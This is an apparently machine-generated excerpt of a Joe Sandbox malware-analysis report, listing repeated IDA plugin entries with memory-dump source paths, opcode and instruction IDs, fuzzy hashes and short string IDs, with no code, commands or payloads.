                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: sX
                                                            • API String ID: 0-3110708420
                                                            • Opcode ID: 4a6237c1e04f97887e64c36261c8cac28f251da7ba0282a0e27e036bd443a1f3
                                                            • Instruction ID: 833e7227f49d88438590949d93ffb9f2e0156b1e794600373de74c0f5a986d16
                                                            • Opcode Fuzzy Hash: 4a6237c1e04f97887e64c36261c8cac28f251da7ba0282a0e27e036bd443a1f3
                                                            • Instruction Fuzzy Hash: 3E61F6B4E15609DFCB04CFAAC5805DEFBF2FF89210F24946AD416BB314D7349A468B64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: sX
                                                            • API String ID: 0-3110708420
                                                            • Opcode ID: 2eeed993b742529fd770773d4ef1c3d14b66f32278805661a48b2ab40e2efbab
                                                            • Instruction ID: bccafe77ab55eac151f878ae406141b6cabbbd7dffc03b8a58f27d27feb38b34
                                                            • Opcode Fuzzy Hash: 2eeed993b742529fd770773d4ef1c3d14b66f32278805661a48b2ab40e2efbab
                                                            • Instruction Fuzzy Hash: 7861E4B4E156099FCB04CFAAC5804DEFBF2FF89210F24946AD416BB314D7349A468B65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: V3~
                                                            • API String ID: 0-1917302123
                                                            • Opcode ID: c642ca394fdde66d94644c31942ebaecf2121530978661266415385794adc8e9
                                                            • Instruction ID: ee11da38d3d23eba83d239090b44304763b8269533614f9252cea548641988fc
                                                            • Opcode Fuzzy Hash: c642ca394fdde66d94644c31942ebaecf2121530978661266415385794adc8e9
                                                            • Instruction Fuzzy Hash: BE513BB0E05259CFDB08CFAAC9405AEFBF2BF89300F14D56AE815FB254D7349A418B54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: V3~
                                                            • API String ID: 0-1917302123
                                                            • Opcode ID: 93fc35162c861f743c4ee71338b7c733b1755de351d8c6f21c3a40d7c763a22a
                                                            • Instruction ID: f4c987640452ae4cef368db0399b6c36f39e1828e340a566d753bbf5658447a3
                                                            • Opcode Fuzzy Hash: 93fc35162c861f743c4ee71338b7c733b1755de351d8c6f21c3a40d7c763a22a
                                                            • Instruction Fuzzy Hash: BF511BB0D152198FDB48CFAAC9405AEFBF2BF89300F14D56AE819FB254D7349A418B64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4$VD
                                                            • API String ID: 0-4229505421
                                                            • Opcode ID: 563ff0825ecdf4d9659fce9de50bacff5070d5656d85d672d2dd325178988c0a
                                                            • Instruction ID: 75db10e4174522da8f0c87db5429ed37c81bb65420ea1c9014c83786714e368c
                                                            • Opcode Fuzzy Hash: 563ff0825ecdf4d9659fce9de50bacff5070d5656d85d672d2dd325178988c0a
                                                            • Instruction Fuzzy Hash: D04107B0E0460A9BCB04CFAAC9415EEFBF2AF89310F24D46AD416B7354D7349642CFA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4$VD
                                                            • API String ID: 0-4229505421
                                                            • Opcode ID: b295e90dfb7426292a2c8879199e1f4ded0e860603ee16daca2db36e5c5b97f4
                                                            • Instruction ID: dd790a1c6f168666c8ea92d45266d6a2c580db864d165079fff74d848cfdae65
                                                            • Opcode Fuzzy Hash: b295e90dfb7426292a2c8879199e1f4ded0e860603ee16daca2db36e5c5b97f4
                                                            • Instruction Fuzzy Hash: 0341C5B0D1160A9BCB48CFAAC9415AEFBF2AF89200F14D52AD416B7254D7349A42CFA5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70753c06e5784c61d3c73b1307d7aef6b8c638022023863a892de52abdb0c3b1
                                                            • Instruction ID: 21d1229ed852b19f2ef6b20c9485a53f31173362e88a4bfd17d9ba9fcb969136
                                                            • Opcode Fuzzy Hash: 70753c06e5784c61d3c73b1307d7aef6b8c638022023863a892de52abdb0c3b1
                                                            • Instruction Fuzzy Hash: ABD1F3B0E15219DFCB08CFAAD9805DEFBF2BF89300F24952AD416AB225D7349952CF14
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 747bd99dd59ad83ed5b60d211357defff79b35d96552428199df226d764e769d
                                                            • Instruction ID: b4440289874f0cef5d06d932bbc805732be88f43fcc03942bc7b926399f0d726
                                                            • Opcode Fuzzy Hash: 747bd99dd59ad83ed5b60d211357defff79b35d96552428199df226d764e769d
                                                            • Instruction Fuzzy Hash: 4FD1E3B0E15219DFCB08CFAAD9805DEFBF2BF89300F24952AD416AB225D73499568F14
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab25a50afb465796f8b2c8fb8972d8e113223464abb5bb03b9e6294c4c5c8448
                                                            • Instruction ID: 1d4f8d4bfdd7e8adbe127e46fc1fc44f54f58674a51e92bd075a09010e8299d8
                                                            • Opcode Fuzzy Hash: ab25a50afb465796f8b2c8fb8972d8e113223464abb5bb03b9e6294c4c5c8448
                                                            • Instruction Fuzzy Hash: EE12C8F0400746CBE358CF67E5582893BBAF78532AF504369D2611B2D9DBBC198ACF85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1ee54184564a60c46c0d9631b1589c9b0e56b3c69d6d69260bca16751951369
                                                            • Instruction ID: 4843521aa1355a1686bd7085fc0592809eab3ecfec5a03cdfe6be74d57e87935
                                                            • Opcode Fuzzy Hash: f1ee54184564a60c46c0d9631b1589c9b0e56b3c69d6d69260bca16751951369
                                                            • Instruction Fuzzy Hash: 51D1F5B4E15219DFCB08CFAAD9805DEFBF2BF89300F24D52AD416AB225D73499528F14
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a112f2f0e6fb93f7920a53d2abd9a3cc67c4721a82eab603f626c5ce71cf891
                                                            • Instruction ID: 38ac18463798156bcf70136fd859c47dc3d5bde98bb054105af04f1947c31a8a
                                                            • Opcode Fuzzy Hash: 1a112f2f0e6fb93f7920a53d2abd9a3cc67c4721a82eab603f626c5ce71cf891
                                                            • Instruction Fuzzy Hash: ABE1FBB4E001198FCB54DFA9C5809AEFBF2FF89304F249169D415A7359D731A981CF61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c324f50a3f94eed0925071919aef6d58421ef7b886f1f185d51f10c0852971f
                                                            • Instruction ID: d46c8cefde654bcd390ea2fa7a4dde0d50aa902a41a07dcef0fb4635e20ac350
                                                            • Opcode Fuzzy Hash: 0c324f50a3f94eed0925071919aef6d58421ef7b886f1f185d51f10c0852971f
                                                            • Instruction Fuzzy Hash: 40E1FBB4E011198FCB54DFA9C5809AEFBF2FF89304F249169E415AB35AD731A981CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 604828cbd014cf576884a44b3b67a608b7fb12e518e62840552688640c7649e3
                                                            • Instruction ID: c2ed7206f394617cbbd6e3d1a5eeea18eeee42ce284d8b97457c43be92a6cfd8
                                                            • Opcode Fuzzy Hash: 604828cbd014cf576884a44b3b67a608b7fb12e518e62840552688640c7649e3
                                                            • Instruction Fuzzy Hash: 4AE10EB4E011198FCB54DFA9C5809AEFBF2FF89304F249159D419A735AD731A981CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3529420fdf37868c1425cf772125bab6bcb7ec5cbf44ebff490efb872393b1e0
                                                            • Instruction ID: d2391ffb3bbc68956399fd5c55cf59a727b1c614a76673242636e47f7756b823
                                                            • Opcode Fuzzy Hash: 3529420fdf37868c1425cf772125bab6bcb7ec5cbf44ebff490efb872393b1e0
                                                            • Instruction Fuzzy Hash: FAE11CB4E005198FCB54DFA9C5809AEFBF2FF89304F249169E415AB35AD731A981CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c3e1ec8070be8a5fa396cb971baf7510382c538e2b1d8503428df1f827aba20
                                                            • Instruction ID: 3a1fc52147713fcd71b274ffd26f458efa51c71414d9605b34d48bf19d2abb8a
                                                            • Opcode Fuzzy Hash: 9c3e1ec8070be8a5fa396cb971baf7510382c538e2b1d8503428df1f827aba20
                                                            • Instruction Fuzzy Hash: B7E11DB4E001198FCB14DFA9C5809AEFBF6FF89304F249169E515AB359D731A981CFA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44f4565eb1a71c1b17953dc8e25f1ecaa913e23129f07a3ffa6c040e09ec8044
                                                            • Instruction ID: 18f628c818e8127a121e9a00b0989bc9729d76458a25b736d87d056166d3c4c4
                                                            • Opcode Fuzzy Hash: 44f4565eb1a71c1b17953dc8e25f1ecaa913e23129f07a3ffa6c040e09ec8044
                                                            • Instruction Fuzzy Hash: B2B117B1E1425ADFDB18CFE6D98169EFFB2FF89200F10952AD416AB254DB349906CF04
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e431cc83f0b27a1a659811df5a6b28c2ded7b0b138517653ed864f51f839b91b
                                                            • Instruction ID: cb6b2cceb732916eeb4d08205167e040a6b615f32b2a19c348c6fb61717ae56d
                                                            • Opcode Fuzzy Hash: e431cc83f0b27a1a659811df5a6b28c2ded7b0b138517653ed864f51f839b91b
                                                            • Instruction Fuzzy Hash: 74B1F5B1E1465ADFDB18CFE6D98169EFBB2FF89300F10952AD416AB254DB349902CF04
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69110f5fd9d9850181fe578927470a4b9aadd8c8c290df00b46720cc222ea483
                                                            • Instruction ID: b1c2e5420b27ec96eacc8cfdd93304d99f10ae2d74e3f9ed87184793d30468b3
                                                            • Opcode Fuzzy Hash: 69110f5fd9d9850181fe578927470a4b9aadd8c8c290df00b46720cc222ea483
                                                            • Instruction Fuzzy Hash: 36D10731C20A5ACACB01EB64D990A9DF7B5FF96300F50C79AE44937215EF706AC9CB91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb66e2e9e62ce398dc0a9c9d4a266f8be0775dcb17eeee9e1d7b560d040a9a61
                                                            • Instruction ID: f6e3916e34b3a8554d129f512c17a59fbe1887dbfb9e2a0081830a7d94f1c719
                                                            • Opcode Fuzzy Hash: bb66e2e9e62ce398dc0a9c9d4a266f8be0775dcb17eeee9e1d7b560d040a9a61
                                                            • Instruction Fuzzy Hash: 2CD1F731C20A5ADACB00EB64D994A9DF7B5FF95300F50C79AE40937215EFB06AC9CB91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73d81be693fc9c7f7c2ad9ca25e17682b78250cadd5f77a98dadc850baf9c864
                                                            • Instruction ID: dca1c55e39889c92af6990608b6ae2f9e80b972c9c287b59fab8359340261942
                                                            • Opcode Fuzzy Hash: 73d81be693fc9c7f7c2ad9ca25e17682b78250cadd5f77a98dadc850baf9c864
                                                            • Instruction Fuzzy Hash: 4BB10BB0E152198BCB14DFA9D981AAEFBF2FF89300F24D159E419A7355DB309942CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 605bc51abab2df8477ce4438a421a8c6adfddfcf7c321bb847d3418f92f21760
                                                            • Instruction ID: 2b25d5df9858e46aa6bf8c740294a60c6c383948b7fa873ba3e58c8fb64ebb85
                                                            • Opcode Fuzzy Hash: 605bc51abab2df8477ce4438a421a8c6adfddfcf7c321bb847d3418f92f21760
                                                            • Instruction Fuzzy Hash: 66B12CB0E152198FCB14DFA9D580AAEFBF2BF89300F24D15AE409A7355DB309942CF61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e1143d64965159c1a625ef6f024243d6c26025677f6a547b09d0e24b8b4736a
                                                            • Instruction ID: 868f65b8199e45876d58e1af29b4d47fe18715980eec64c370513fe5f4410158
                                                            • Opcode Fuzzy Hash: 2e1143d64965159c1a625ef6f024243d6c26025677f6a547b09d0e24b8b4736a
                                                            • Instruction Fuzzy Hash: 0AC134F0800746CBD758CF66E9481897BBAFB8531AF104369D2616B2D8DBBC1D86CF85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4976754d41e89c04aab865c5dade71eaea4b7b5e2358f5621cd2924138c81721
                                                            • Instruction ID: 3114cc4f80ddf1d2b90d7f55d7dd2034bf522f67d8e4a50051a3b84ae3eb8067
                                                            • Opcode Fuzzy Hash: 4976754d41e89c04aab865c5dade71eaea4b7b5e2358f5621cd2924138c81721
                                                            • Instruction Fuzzy Hash: 9DA11CB4E152198FCB14DBA9D580A9EFBB2FF89304F249159E409A7355DB30AD42CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9d6b3a96d035d261602fb03a95b2f628d9facbbf6a41e06031c96bcaaa7e5e9
                                                            • Instruction ID: 501acc1856932a57937e8422c6a7698088e8a8ea3db7a5bc086eb844e20fadb2
                                                            • Opcode Fuzzy Hash: f9d6b3a96d035d261602fb03a95b2f628d9facbbf6a41e06031c96bcaaa7e5e9
                                                            • Instruction Fuzzy Hash: 4081D0B4A15219CFCB44CF99C5849AEFBF2FF89210F248559E416AB260D734AA42CF94
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 900fd361b0e64d4793ae502e03d4bf692b9e8d9af8f7f784ebba4823382e9113
                                                            • Instruction ID: 9895f7bc6f6e5306683c41722d551a0100297b55c31e9633c671213f9884e3da
                                                            • Opcode Fuzzy Hash: 900fd361b0e64d4793ae502e03d4bf692b9e8d9af8f7f784ebba4823382e9113
                                                            • Instruction Fuzzy Hash: 7971D2B4E15219CFCB44CFA9C5849ADFBF2FF49210F248566E415AB360D734AA82CF54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 95f9956f5787d458c0ba8908e0f755449a4aae7443b33fc88bcf6e6cb63f7e76
                                                            • Instruction ID: 59915bba12fc08cee4b63c8198feeed40adb209095fa1a5daf935cd29ef63e57
                                                            • Opcode Fuzzy Hash: 95f9956f5787d458c0ba8908e0f755449a4aae7443b33fc88bcf6e6cb63f7e76
                                                            • Instruction Fuzzy Hash: 1E6115B4E11219DFCB04CFA9D5919AEFBB2FB89310F249555E805AB314D730A982CF98
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02d81041ed03530bfdf940a068a9a44bca15ba67ba1ddaa0b688f31dd306ed12
                                                            • Instruction ID: 4ce6946185c2e8354d81ab2d1e0b2e60373e55e83d7b39af27283c82184dc73e
                                                            • Opcode Fuzzy Hash: 02d81041ed03530bfdf940a068a9a44bca15ba67ba1ddaa0b688f31dd306ed12
                                                            • Instruction Fuzzy Hash: 966117B5D1121ADFCB04CFA8C5919AEFBF2FF89210F249556E806A7315D7309982CB58
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15db62ce3421508d4ce859e7a8912ddfd7c25d7e694f4f982e57505f890519fa
                                                            • Instruction ID: 8fa3da21b53893a0d245fa3db17a0c4bb4890f9e0487e402aeaec94bb11a7fe8
                                                            • Opcode Fuzzy Hash: 15db62ce3421508d4ce859e7a8912ddfd7c25d7e694f4f982e57505f890519fa
                                                            • Instruction Fuzzy Hash: 54511CB1E042198FCB14DFA9C5809AEFBF2FF89304F248169D519A7316D7319982CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61a06591889793ca39b2b0c12646a8ce74112b4cbb367d9fc1ef3c4af4f27612
                                                            • Instruction ID: 5a6dba413e0cbae0067c9702ee5ad7eb899cc9c5f79888ebeff1f9d98b2501b1
                                                            • Opcode Fuzzy Hash: 61a06591889793ca39b2b0c12646a8ce74112b4cbb367d9fc1ef3c4af4f27612
                                                            • Instruction Fuzzy Hash: 01512BB4E1520ADFCB08CFA6C5414AEFFB2EF89310F24D46AC416B7354D7359A428B95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2aa65b4a54104c2de6d5d63e2ce72a64f12f334de20d9974e37921cb3bf4221
                                                            • Instruction ID: dc2dce87e6a4c85fb52fe61c67f9ca5c360378dd718d9ab12bbe065d023db45f
                                                            • Opcode Fuzzy Hash: b2aa65b4a54104c2de6d5d63e2ce72a64f12f334de20d9974e37921cb3bf4221
                                                            • Instruction Fuzzy Hash: 6551F8B4E1520ADBCB48CFAAC5815AEFFB2EF89310F24D46AC415B7314D7349A428B95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67f0ea6d2d5bf0947da14c5b4448a92388d71eff0e3e29d1e893e330630e6be6
                                                            • Instruction ID: f0679903979675dde1f568794e2031623f6c932836f677f4aca61b93fbd2aa35
                                                            • Opcode Fuzzy Hash: 67f0ea6d2d5bf0947da14c5b4448a92388d71eff0e3e29d1e893e330630e6be6
                                                            • Instruction Fuzzy Hash: FE417EB0E1560ADFCB18CFA9C5804AEFFB2FF86250F24D599C016A7215D7349A82CF95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 78308ea9f6af4da7983c6e6b843276035199cd3f770d7ebbb922b336a3b6aadd
                                                            • Instruction ID: 55b6352f0c77bc25b528d5dd6df60c76ddd6fa0a9a09f9812dc8aefa0a8225a7
                                                            • Opcode Fuzzy Hash: 78308ea9f6af4da7983c6e6b843276035199cd3f770d7ebbb922b336a3b6aadd
                                                            • Instruction Fuzzy Hash: F6413DB0E1550DDFCB08DFA9C9904AEFBB2FF86240F24D599C016A7204D7349A818F95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 967afa33f7472233ccdbd0ed38f9ee42c79560b59d7fb3602727f5b45ab4f0c4
                                                            • Instruction ID: 608fc86412fe684088aa2f7c69c9afad43e17c32375d6d56e2dcf4c5db09e876
                                                            • Opcode Fuzzy Hash: 967afa33f7472233ccdbd0ed38f9ee42c79560b59d7fb3602727f5b45ab4f0c4
                                                            • Instruction Fuzzy Hash: 90312DB1E116189BDB48CFABC8806DEFBF3AFC9210F14C166D808A7214DB345985CF61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5bb2e56e41b126484a6138a14b6572c12001923f6cba528f0ade45650d0d8ca4
                                                            • Instruction ID: b9e82e37533faf413790693d28b15184625254cc50b326a49c00807150701a22
                                                            • Opcode Fuzzy Hash: 5bb2e56e41b126484a6138a14b6572c12001923f6cba528f0ade45650d0d8ca4
                                                            • Instruction Fuzzy Hash: C9310DB1E156598FDB48CF6BC8406DEFFB3AFD9210F18C16AD808A6215DB344585CF61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                            • API String ID: 0-2697097662
                                                            • Opcode ID: 2320d12818fe6947717cfd4a05dfcfdc5127e400b1e0ee4e8f506e09fb8af013
                                                            • Instruction ID: bf87d34848a28bcd613124225abcfb2ce14333c3ef0233486d5140462d4af75f
                                                            • Opcode Fuzzy Hash: 2320d12818fe6947717cfd4a05dfcfdc5127e400b1e0ee4e8f506e09fb8af013
                                                            • Instruction Fuzzy Hash: F4226F70A043098FCB58EF75E95169DB7B2FF84304F5086A9D009AB269DF346D8ACF91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
